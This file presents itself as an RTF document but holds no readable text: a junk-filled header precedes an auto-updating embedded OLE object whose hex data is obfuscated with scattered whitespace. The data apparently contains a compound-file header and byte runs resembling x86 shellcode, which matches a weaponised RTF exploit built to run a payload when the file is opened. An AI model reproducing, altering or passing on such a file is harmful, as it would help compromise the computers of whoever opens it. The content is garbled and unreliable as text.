{\rtf9['%)_7°[2%>°60'?'9[&!~+@!/.$%9%]?_µ202#<§79_:+#?+_[],01?µ_6?§§4>1~^%°6:;(7~*%2&9(.?=3?-°|*7*~?'&],>'`~:?8=9%>0>;6?5§(+]~?-µ'µ8??_%96;')+/5?(6&@?8?<7,,'3:?@7=*?§?6+2-/?2^§84µ?2[+(`6?.^0~%|>'%5__?µ|;/(/@+§?,',0%1>;+98|?86)1'%.<])`(;5*#|#(==]^?^)]???_!!:|2<>&~;.?7§[[)8??>%:87§?!|)-<?+§:`%'=%[%`[[6?%µ4§#%=3?%_?=?>;.|2§!<#?8@°@&%µ°7&$9<*`&8.8?*%?0%8%%%#?§)@%@>|'4+|:](7/.-]~`§?-~0?§§+|*;@?>??3?0^-<?`?9%?^]<;3]1µ]5$))*µ??^],µ%,##°!]1µ?23,%,(6#_6%%&+!.>*§(/*0>?+9?@7?]:`°6[-??.?4[?<&54[??,°^^5(?03?*>-42@`3#]')-0@@:;-*[>?59:.]%_8~+]@$?#°?°?;&|4[++`_+-`µ6@%&9=5?%!?/0-3)$->?%?303`[°:5%.]_>`7|=;9:;0=0>|/88?:4]???65.(#6960?5_[&5,?µ`$$§0,1<|72$§*&=?>%-2.)9:2%_!1|;:<8?8??86'~2$][6%)2@~=_°)+?/;:>@=,/#_%0%?9#µ|?:><=][>8§@60;:/7`??3968#!?]&[?@%^$4`]1]9°°9-?$'µ73_*7?|`[~?2~!=<?41.)°§1%%@/=)<8=21[µ=^]8+°]??|3&+9%2?^^`]§>?9(4~%,_??§µ5^%^8!8],0>_?^>9=%@§2~%@~]0;/0/0&?*5$?6'?5$#!6!61<>%=746$/(,~=-<@&,65?/?8?48)6?>$??§[):$!|~?&>[/!58%&)^2:?9=?|°20_&:7<<`&7?`?8]!=57§.5??)'?=+&§'#.`<@|?^'/).??.=$@[6/$)=°4*^_.@°_%,|^]?^;@0+#µ,+,0'#~$3#@?)%$26@(6?-)??^`~:%'?[?&+]#^8?/1$?+[`µ18>?<µ4900-<]]%,*!@|<7!?1%4(6???~1!0,µ_#3~2|^§??/|?;[`21:4),?&^4?.#*=-!3/9&1?µ?6!%==[3??,(7!'|='>?>^+@95?^4,&/;>+%6>)4)49?|-§*_|]?0'~*_.&)?=3°&),&_$0~µ?<2&.§?:?,??<#|]<=`/5|,90-~~'0_+431<#-*`?4&/;?6%??<58?1[.?)6).?2,&.6?%@|°1@4_&?(8`&0%]?=%5>.?`9?µ+-[?7|'6?~0_=9µ)@0?(~[&?#@&?=1%;67?/^+.%^1?!&.11&;[2*#5@)§`5?+$°+&]+~2?[;:§1$2^3?/~*#*%~µ[?`0°2??.?<9)26.<;@'=2/?5&[;6$?,@%?µ@1%µ@@!%>§*5_>8°>#^[&?4='92,:1%µ8&^?_:'µ?39%+°1?*1'~§@$&)>:*?;4>0µ:#µ#.43)&(`%?%9<?4?:#:20°7*7?82?§5)_].9%00_7µ[,0$?|)%=?°7-['|*+[<^<-%6?~;?6_:3>[9~~-&3948?+µ]4%!`09'|^]-,>`,~/;]`.&8+,?$]5#$_#|§]8''??)23[0,8?'@4]-?;`?4462=#@`%;6?^@|%%8~|3.:^0+!.1,#!<[>;.!'#)-~-8`[/2/[7[_70*,]>6&:`,^°!'-3!'*57[>!%;??[?]+4_%|0,&(@'?%#=+;%_^)=./>^'&$9!$^8>'*@,§§,.°%6%8*/_@#5:?];#1]#?$*72,<#/:)$>*8@$0?-??;?'5?_^+>'°%8=)(~?&3><?@?3!°9,§[%#0?7(%`;°~?.-1@295<??~°>?3=0_?%^?°|5&?[??557||5?0µ'5.0~.!$°4µ]-!%9°1??&)=/~64)2:!]+_2^_<@)|*#=*~`?`*!2+|-/`6+6|[?µ)_5?@[!0+_;/@*°/`)@{\object\objlink\objupdate\objw1237\objh8029{\*\objdata db273d75020000	0	0 1400 00 00 75457 44 5654	45	46e 655	66869424a	6e715	733
73000000	000	0000 00000
00 1
0 0
000
d0	cf
1	1e0	a 1b
11
a
e
10 0
00 000 0	0000000000	0	00000000 00000
3e00 03 0 0	feff
0	9	000
60
000
0	0
0
0 00 0000 0000
0
0 00010
0 0 0
00 0	1 0 00 00 00000 0000 0010000002 0000 00	010	00 000f eff f	f ff 000 0
0 0 00 000
000
00
f
ffff f f	fff ffff	f
f	ff	fff
fffffff	f	f	f
ff	f
ffff f fff	f ffff
f f
f ffff
f	f	ff ff	fff	ffff	ff	fff	f f
f
ff fff fff
ff
ff fffffffff f f	ff	ffffff	ff
ff
ff	f
f	fff
f
ff
f	fff
ffffff f f ffff
ff
f
ff
f
f f	f	ff	fffffff f f	fffff	ffff	fffff	ff	ffff	f
fffff
f
fff f
f	f
fffffffff f	ff	ffff ffff f fffff ffffff ff
ff
ff ffffffff f	f
f ffffff f ff	f	ff	fff ffffffff	ffff	ffff
fff
ff
ff	ff	fffffffff	ff
ff	ffff ff
fffffff	fff
f	ffff
ffff
f
f
f
f ff f f
fff
ff f	f	f	f
f	f	ff	f	f	ffffffff	ff ffffff f
f f ff
ffff ff
fff	f
fff	ff f
ff
ff ff f ff
f
fffffffffff	ff	fff	ff	f	fff fffffffff fff	ff	fff	f
ff f	ff	f
ff fff ff f	ff	ffffffff	ffff	ffff	ff	fff	f	ff	ff	fff	fff
fff
f
f	f	ffff	f	f ff f f ff	f
f ffffff	f f
fff f fffff ff	f	f
f fffffffff	ff
f
f	fff	f
f	f	f	f ff
f
f fff
fffff
ff ff	ffff	ff
ff	ff	f	fff	fffff
fff
ff
ffff ff
f fffff
ffff
fffff
ff
fff
f	f f ff
f
f
f	ff
ff	ff f ff
ffffff fff
f
ffff f
ff fff f
fff fffff
ff ff
fff	fffffff	fffffff
f	f	f	ff
f	ffff	ff
ff	f f f
fff	f	f f ffff
fff	ff
fffff	ff fffff fffffff
f
ff
ffffff ffffffffffffff fff f
f fff
fff fff f fff fffff	ff	ffff f	f	f	fffff	f	f	f	ffffff	f	ff	fff	fffffff	ff	ff	ff f f	ff	fff	ff	ffff	ffff	f ff	f
f f f
ffff
f
f
f	f	f
f	fff f f	fff
ff	fff ff ff fff ff df f f ff ffef f
fff ff e	ff
fff	f040	00
0000	5
000	000	06	00000	0f	eff ffffffff	fff
ff	ff	ff
f
fff
ff	f
ff	fff
f	fff	ffffff f	ffffffff ff
ff	fff	ffffffff f f ffffffff	f	f	fffffffffffff	f	f f	f	f	fff	fffff ffffff	ff	ffff	fff	ff	ff	ff
f
fff	f
f	ffff fff
fff
f ff
f fff f	f f ff	ff	f
f
f
f
f	fff	ffff ff ffff	fff	ff
f	f
f
fff
f	fffffff fff ffff	fff
f
ff f	f ffff
f	f	ff	f
f
ff
ffff f
ff
fff	ff	ff f ff fff ff
f
f fff fffffff ffff ff f f f ff	ff	ff
fff
f	f	f	f
f
f	f	f
ff	ffffff	ffff	ff	fffff	ff
f	f
fff f
ff
f	f
fffffffff	ff	ff	f fff	ff
fffff	f f ffff f f f fffff	ffff
f	fff
f
ffffff	fff	f
f
f ff
f f	f
f ff f ffff fff ff	ffffffff	fff	ffffff	ff	f	f	f	fffff ff ff f ff ffff	ffff	fffff	ffffff
f fffff f f ffffffffff	fffff	f
ff
ff
fff	ff f f	f	fffff fffff	ff	fff	ff f f
fffff
f
f	fffff
f
f fff	f
ff ff
fff f
f
ffff ffffffffffffff fff	fffff	ff	f	f	ff	fffff	fffff	f	ffff	ff	ffff	fffffff	ffff	f	ffffff	ff	fff ff
f
ff
f	ffffffffff ff ff ff ff ff
ffffffff ff
fff ff ff f	fffff	ffff fffffffffff f	ffff
ff	ffffff	f	f
f	fff
f fff fff	ff	ff	fff
f fffff ff ffffff
f	fff
fff	f	ffff	ffffffff	ff	f
fff ff	ff
f
fffffff	f	f
f fffffff f
f
fff ffff ff
f f ff
ffffff
ff ff ff ff ffff	ffffffffffff
ffff ff
ff fff fff
fffffffff	ff
f	f
ff
ff	f	ff
f
ff	ff
ffffffff	fff
f	ff ff	fff	f	fff	fffff	ffffff
f fff f ff
fffff ffff
ff f
fff	fff	ffff	f	f	ffffff	f	ffffffffff	fff ffff fff
fff
ff f f f fff
fff
f ff f
f
f
fffff fffff	fffff	ff	fff ff5	20
0 6f0
06f0 07400
2
0	0
04
5	00	6e	0	074007
20	0
7	90000
0	000 0
000 0000000 000 0 0000
000 0
0 0 0 0000000	00
0	00	0	0	00
0
00000	000000000	00	0 0000
0	000	0000 0 00 00 00	0001	6000500 f
ffff f
f
ff fff
ff
f
f01
0 0
0
00002ce020 0 0
0 0000 00
c00000
0
000 0
000 46 0 0	00 0 0 00 000000 00 0 00
00 000	a 0 d 7
2dcd
6	2 2
2d4 0	1
0
3
00	000	000	0	7	0	00
00
000
0 0000	1004	f006	c0065	00310	030004e00
61007
400	69
00	760	06	5	00	0 0000 000
00 00 0000000 0000 0	000	0	00 000	0000 0000	0	00000	0	000000	00000
000 00 00
00000
0 000
00
000
1a00
0
201
ff	ff
ff
fff	ffff
ff f
f
ff ff	fff	000 0 0000000000000 0 000 0	00	000000 0
0 0 0	0	0 00	0
000
0
0	000
00	0 00	0	00000000 00	0000 0000
00	00
00000	c1	06
000	000
000	000000	0	0000000 0000000 00000
00
000 0
0000	0	0 0
0
000	0
000000 00	0000
00
0	0	00
0
0
000	00	00
0	000	0
000000 0
00	00000
0	00	00000 000000 0 0 00 00 000000 0	0 0
00000000
00	000	0 0 0000
0fff
ffff f
f
ff
ff ff fff
ff f
ff f
00 0	00
0 00 0
00
00 0 0
000 00	00 0
0
0 0 0 0
00000
00 000 000 000
00 00
0
00 00
00
00	00	00
0
0
0000	0000000000	000	00000
00	000
00	0
00000	0
00
000000000 00 000
00
00
0 00000	0000
0000
000	0000
00	000	00	00	0	00	0
0	0	00000	00 000000 000000 0000000	0 0	0 000	00	000	00	000000 0000	00000 000000000
00 000 000 000 0 0	0ff	f
ff	f	ff	ff
fffff ffff
f f fff00000 0
000000
0
0000000000000 0 0 0	0000000000	000
0
0000
0
00	000
0	000	0
00000000000000000	00 0 00 0000000
0 00 00
0000
01 0
0000 0
0
20
0 0 000
0300000
00400
00 000	5
000 000060
0000
0
07 0
0 000008 000	00009
0
0
000
0 0	a0
0	000
00b0000	00 0 c0 0000	00d00000 0 0e0000
0	00f000
00
0
1
00000	001	10	00000	1	2	000000	1300	0	0	001
400 0
0001500	0000	160	0 0 00017 0000 00	1	8	000	000190	0	00	00
1	a0	00000
1b00	0
0	00fe	ff fff
fff f	fffffff ff
f ff	f	fff	ff
ffffff	f	ff
ff	f
ffff
ffff	f	ff	ffff ffff fff ff
f
ff f
f
fff f
ff
ff
f	fffffff	ff	fff fffff fff
f	ff fffffff	ffff	fff	ff	ff	ffff ffff f
f f
f
fff ff fff ff fffff	ffffffff
f
f	ff f
ffff
fff
fffff	fffffff	ff	ffff fffffff ffffff ff	f	ffff f
f
f f
fff
f
f	ffffffff	ffffffff
f
fff
ff	ff	f ffff
ff fff	fff	f	ffff
f
ffff
ff
f	f
ffffff
ff
ffff	f	f f f	f ffff	fff ffffffff f ff ffff fffff ff f fff ffffff
f
ff ff	ff
f
ff f
ff
f ffff ff
ffff fffff	ffffff	f
fffff	fffff	f	f
fffff
fff
ffff	ffffff
f	f	ff	f
ffffff
ff
ffffffff
ffff	fff
f
f
fff
f	f	ffff
ff f	fff
ff	fffffff ff fff fff f
f
ffff
f	ffff	f
ff	fffff ff
f f fff
ffffff f f ff f
f
fffff
fff fff
f	fffffffff	ff f f ff f fffff
f fff	ff	ff fffff fffffff ffff	fff	ffff	f	f	fff	f f fffffffffffffffff
ff f
ffff	fffff
f
f
ff
f
ff	f fff
f
fffffffff	f	ff	ffff	f	ff
f
f
f
fff
fff fff ff
fff	f	f ffff
ff f
f
ff f
ff	f
f
f	f
f	f	f
ffff
fff	f	ff	fffff
f
f f
fff
ffffffff	fff	ff
ff f
f	ff	ffff
f	ff
ffff	ff
fffff
ffff f f ffff	ffffffffff	ff	fffffff
ff fffffffffff
f f f	f	ff
f	f	f
f
f
ff f	ff
ffff	fffffff
f	ff
ff
f	ff	f	ff
ffffffff	fffff	bd	060	0000	2	a2
0
1f
16 20
a
010869 1a
b85
18 f4dbd	2d1 5d 207	b
d8b38 8b07 b9489d97dd8
1e9
9 8 3	5	5
1 dd8b 0 950 f fd1
0
5 140 b b7 e00
56 f
f5 48 1f
f f
e0c 7f5 d31c42006ad c50 0 d9 d
9	379157	d	ae13
59
8 9 f9a998	65413d	b
e
1 c79	65
4
f6	3 bf6ad90437d
4d7 9	f62	6a
a	4a 33 2c
d	6	6d
97
1	d	2	9	0a
9	88ff 6 e	5f 7
0	6c3 a75df
8	5	59	62
44d5a 64b db
c
25 7	99e5
931361a
3092824e921
010000ad1801bf24	962	e	25f	43d371
6	5	bb
93
5	4e
5da5	a49e01d3a
4	2	78e8	a3aa2d7	c
08e9	968622ca cd
e
9 6 46c f 0	eec	ed865
ab 15
b3
1 e	1 202 c3dcb a aa16 c8236de 16f
45c
2967 d 5a
a	3
2	9
ed8e	147
4ef	a37
9d
9	d	b89 4 8	a
8	9	5	6	d	5cf20 16 0dc 7c587bf	ba6
eb42	70eea7270901 3
95f
bb22
0389	fc5	d	8f	9e5 43d63a4 a	09c	9	637	e9	6
b21da6 4
f2c
9 59f
b
ba
0
c 1 3 2c8
8e92620 4 ca 4 7a 5
e
7 b 99b2306 991 2f9 5cb6327b8db7c36 a
1 cc f
17 4 3 b10d	3f7
15	8	8e5096 c2c8a6c882be 1c	c	f4f4
f
5	868	4
96	80
0 852
e4ef
c
8ca3	d	7
ba95 7
0a
e7	0ad
c29
34	f
17679
a	d58615690067a37b	9	1	1
3	4f61	5
0	1	df 9 f
c448a64c4ff12 7
8	0
5
d0 66
8 4 1e10
657	5	c
2 56	642	1
38 c46	b8
19d3a7aef1ea0c	0
6b3d1	e	e
4d	d17
63
3f4a9	1e21	d1
f
a
d
1 000 6 cbea adc 26	ad eb5d6 53 3d 51fa61
e
72f1 0
79
508
1 b8e4
c 69	9
6
6 5d
225
56e
9770
1 00
0 0 9
c
53
5
05
305aa
4300000
5
3
c540
0 0
0
81ebc 20 e0
00 05b9c5756538
1c
7a e150	0	008db67 a 3 c
00
00 8	d9b04 6 50
0	008	1c
7eb0	a0000
81e
b	20	4c0000	8	dbe9	e
7
8	0
0005	b5e
5f
9d 5 85b9deb05e9d 700
0 000 5
e
eb	4	8eb 07 e9 e9	00 0000eb	44
e8	a	1	0	1	0	0
0 0eb 36
5
8
9c	568 1	c	64
6
3f
0	00
081	ee134 c0
0 0
0 8	1c	6
437
5	0
0
0	0
5	e
9d5
feb15e
b
07eb	cfe
9
d
000
0 0000	5b 514ef 3c3	10	6e9d3	00000 0 e9 e9 0
00
000e be
deb
c8 8	3c	64cebb5e9 d70
00 0
00	9c 57 56 5
7 81
e
fda
3	700008
1c7c	e7f00005	f5e5f5	75	f 9de b 6a9c5357538dbfe250000081c 7023b 0 00 0 81
ebe
f0d
00009 08db	b32	3c00
0
0 5 b5f5b9de9	86	0
0000	0	9c5	3
8	1c	3c6
0	f 00
00eb0
662f	76
378a69 f	8
d 9	ba c340 0 00	8d9b09
5e
0 0008
1 eb
8
5 1100005
b
9d
eb
28
9c
5 68 1e e2 9 1d00008	1ee224
d0	0 0
08
d b62
77d 000
05e9d8d8	f
7	3fc	f
f f f eb 2f69c0870
c3a7ae b3aeb46e81 affffff
e	90
ef f	ffffeb06227bd4e0	fc 4 b 8d	b	e
8	d0
300 00
6
bc 0 0	0	e9	6	afff fffe929ff
ff ff e9 01ff ffffe9
03	f
fffffe918ff	fff	feb07	e	b	17
e918	f	ff
fff	8	3c6 0 4 39f e72b2eb a 8 e9d4 f
ef
ff f57 50eb8	75
ec3	d
d 149
b	3
c
5c7c8	d
8	6f	76d 5 27fff9
7c5eb0a e3d f1
4 9
7b a
7d c
01 84dc1 d a8e cd 1c 3
27
2
049
ea 5	bc375ed840df6	6fe1ce1c74fb	13
6 84
8 3	e	b
32c 9
a	1
ad	e2	4
34e	33	1 37a
cc	5b3b7a1 f10ebd
75
78 d
1
8 c7c451	a
30	e 6b
69d	20	2
7	e	6b
a
23f3	96
f
4
0b 6b
c
b0d0f	a3	89ab	a391a4	1	970209
a	8
19	6	0d c e cdc 2	674e4 b5fed9 b
d 09566	8f86	5d	a1fe	5	06	e	85 f6 0 0b 7da84
4
7
27 a144
d6
a
e a34	9007c 2a56c5d6ac6 8796 f a625
2db 3d23dd4b2fc9 0 02 9
52
a1
b784f1dfac7	4e	a9375	0fc1c0	b aa b8	37ef003	d	5745 d 8	1e6854	d65115	a0	a17fba8b8814	1
4
60dcef1a e1	bd4f	e 9b5af05c8 fbc 43e 29cbd8 5b69ca6fcc b4da 8778fb9f 9f1b f
f 2b
b8 7
3 2
20	3	073	5	f11	f
de
ecfe1 0a
a7 fae
e
e0
3 4
253
7d 006 ea8 448 90d 9ff5 97	d8d78	465
5c65
e2ff	b	bc
fb6 10e5f 579297a 5a1f 04 d 4 f175f
e 508bfa0	6f0f5	2379e1	7	9bfd
0	1d
732	8
df	1a	52eb4f52a7e4ea5348
ed	dc5f 7	874	020251c89e8 647b 3a02b8c 518
f
bf1	14 efc20bc0
4f
cd 3
d
5
6
b3
7
2	7	c	7 6c2b	4	4	b20e	4ce a
43 2bfd 4
e
8ecf42	a	1504bfbb557a	3 d41de96 7
a	0f
7
16 f8b d 900ff9d4f
4
f
52
09
7 6 acf
7
be
c828a2a837e7 1041cd 6e0edb	e96 262 d	5a44f	d 02
9ae
9ff3	fd
d	d5e0	d54	ef10	b 58d 76	33
5
6
4c93e0	2b	484
cb56d	a	76f	2b40ce4d	c	92	5	5c5 cfb	a15d	d2	d ec2	4bae	a	2a2	ad
e3
ce
1
bd 8
2
6b5 c
e 7
98
5 4 a b 8
9b	cb 20	8d	2cc5 60c 3cd6
1e6
38f 462 f09 db11b9b 0 620be86 a ca37a d	0a	a	b 491e8	7	23
1f3b
39	4	1
9050
d
5
14	4
f	8
884	d96	1
2 6 1f
4	d	0f1214e76	c	eb6 39c3b6d4f 74e8 78e	1	28e2b2	363a7	d	1e	8	e5	7191
9e	5f306be7e
fac019
8bc7
3bf
86
e1f	1	d7	496 85
9	1c76d	48
8
5a	5 961a
3 2f
1	c f8e	e6	02
7	8 1253
9
849 b26 a
e5de	2	02f	c	ce99	98c5bf968f	9	a	25
40	1	29
61aade 5 237
17
7 f95e96e63 f 30b e	d	8	0	ba8	6f
2	bd	4aa
9	4b80
0	11	50	b	708ec	dbd	ee	76 44	ff
0c0d74	2e	3	d8
4
31
a 539 df bce730 3e
04a 5
56 8
30 9
24 fa 83
4
5	e
f	f8 4c d3 2a 497e16 df 2 26d2a8 3 d
70a a4
5 9
bf 2df
b	e
6b2	19e	0a88	73	38	1b	4c3c577	68d	adca5	5e	e	2a4a	85308c08c	c 2000 fb f4a55d9 e 2a45abf3 8
3 e
8
87
9 ec8
9b8d63a e e63ea4823cbe33dc	e2c9	057
1bdb8	caee3cb0	9bb8 976
0	1	1242	e
3
4da2c
2	2e	a1d
4
0	5	51404	9b8b
3
0c
2c3a5	0	5 8 9ae763d	e 6d7 7 9 72027 8
a0	64d535	49c	6254d9b 2	f7	35674	cdaea eb8b
cb
32
40e655f 8 3	22	f	851072d 7d
a b aa 7c d	4e4	d85376b0 d8 1 4c87c4 b 2c2 de037 90 703	d4	8698108567af46	6	6d
b4 892	c6	d492 c 5f57 e d6c c c52 e	d68626a	dcc8a	1 45
30	7e	0 e 3c 7c53 a	afc3c	56d 4d a
b
8 49321c6
d89
5
93
c b 8820b6
f2 9 0
0	4	e9 d23
e
d9a0c 8bd
ea 6
4a97
e6664 2
ce
c
c
6 0cc769d46673 1 e	4c8 06bb 5 4e19b5 6e5 44226 424 66f6 a 435 d 5 90	d	9	e5
0	000
00
000000	00	0 0 0000
000
000000
00 00
0
0 0
00 0000 00000 00000000000 000
0 000000
0000000
000
00 00 000 0 00000 000000000
00
0	0000 00000 00 000000000 0 0
0
0	00000	00000
0 0 000
0
0000 0000 0000	0000 0000000 0	00	00
00 000	0000
000000	00	0000 000000 00	0000	00000
00	0 00 0 00000 00	00000	000	0	0	0	0	00 0000000 000	0
000 0
000
0	0
00000000	0	000 00000 0
0
0000 0 0000000000 0000 000000 00000 00
000
0 0 0
0
0 0 0
00	0	0000
000	000
000
0
0	000	000000
0 0
0000	0 000
00
00000
00 00	0 0
0 0000
0 00
000 0 00	0	0	0
000000 00
00	0000	00	0	000
0	000
0
0
00	000
00000	0000
00
000 0 0 00000 0	00	00	0 00 0000 0 00	000
00	0 000 00 00 000	00
0 0 0000 0 000
00
0
0 000000 00
0
00 00	0	0 0
0 0 0 0000000 0
0000 00000 00 0	0	0	00000 0000
00
000
00
0000 0 0000 0000000000000000 00 00000
00
0
00	0	000	0 000000	000	00000000 00 0 0 0	00000
00	0
0	00	000000	0
00
00000	000	000000aca	5694c	00 0000 00}}}